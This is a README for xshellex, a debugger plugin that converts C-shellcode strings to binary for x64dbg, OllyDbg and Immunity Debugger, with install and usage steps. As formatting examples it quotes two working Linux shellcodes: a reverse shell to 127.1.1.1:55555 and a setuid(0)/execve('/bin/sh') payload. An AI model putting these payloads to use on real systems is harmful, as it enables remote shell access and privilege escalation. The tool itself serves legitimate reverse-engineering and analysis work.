xshellex
WARNING: the ugliest code in the world
With xshellex you can paste any kind of c-shellcode strings in x64dbg, ollydbg & immunity debugger. Also you can convert the "binary-copied-clipboard" to c-shellcode string.
Please, consider make a donation: https://github.com/sponsors/therealdreg
This plugin uses shellex, my handy "C-shellcode to hex converter" tool for paste & execute shellcodes in gdb, windbg, radare2, ollydbg, 010 editor etc.
Install
Just download https://github.com/therealdreg/xshellex/releases/download/r0.1b/xshellex01b.zip
Extract the .zip
x64dbg
Copy the release folder in the x64dbg folder.
Now check if you have installed:
- x64dbg\release\tcc
- x64dbg\release\shellex.exe
- x64dbg\release\x32\plugins\xshellex.dp32
- x64dbg\release\x64\plugins\xshellex.dp64
ollydbg
Copy the ollydbg folder content to ollydbg path (I use C:\odbg110)
Now check if you have installed:
- C:\odbg110\tcc
- C:\odbg110\shellex.exe
- C:\odbg110\shellex.dll
immunity debugger
Copy the immunity folder content to C:\Program Files (x86)\Immunity Inc\Immunity Debugger
Now check if you have installed:
- C:\Program Files (x86)\Immunity Inc\Immunity Debugger\tcc
- C:\Program Files (x86)\Immunity Inc\Immunity Debugger\shellex.exe
- C:\Program Files (x86)\Immunity Inc\Immunity Debugger\shellex.dll
Use
Go to Plugins --> xshellex --> launch
Paste your c-shellcode string
Press enter
Press Control+Z
Copy the output to clipboard
Use x64dbg Binary Paste (right click in disasm)
WARNING: In x64dbg you can use Paste ignore size BUT in ollydbg & immunity debugger you must select first a long area:
Converting binary-copied-clipboard to c-shellcode string
Select area
Right click --> Binary ---> Copy
Go to Plugins --> xshellex --> clipboard to ....
Why this plugin?
In real world yummyPaste plugin ( https://github.com/0ffffffffh/yummyPaste ) cant works fine, because you have a lot of garbage to filter, just check shellcodes like
http://shell-storm.org/shellcode/files/shellcode-833.php
unsigned char code[] = \
"\x68"
"\x7f\x01\x01\x01" // <- IP Number "127.1.1.1"
"\x5e\x66\x68"
"\xd9\x03" // <- Port Number "55555"
"\x5f\x6a\x66\x58\x99\x6a\x01\x5b\x52\x53\x6a\x02"
"\x89\xe1\xcd\x80\x93\x59\xb0\x3f\xcd\x80\x49\x79"
"\xf9\xb0\x66\x56\x66\x57\x66\x6a\x02\x89\xe1\x6a"
"\x10\x51\x53\x89\xe1\xcd\x80\xb0\x0b\x52\x68\x2f"
"\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53"
"\xeb\xce";
https://www.exploit-db.com/exploits/13359
char sc[] = /* 7 + 23 = 30 bytes */
"\x6a\x17\x58\x31\xdb\xcd\x80"
"\x6a\x0b\x58\x99\x52\x68//sh\x68/bin\x89\xe3\x52\x53\x89\xe1\xcd\x80";
Compilation
Visual Studio 2013
- https://my.visualstudio.com/Downloads?q=visual%20studio%202013&wt.mc_id=o~msft~vscom~older-downloads
- https://go.microsoft.com/fwlink/?LinkId=532495&clcid=0x409
WARNING: To convert ollydbg plugin to immunity debugger plugin just use auxtools\PluginFix
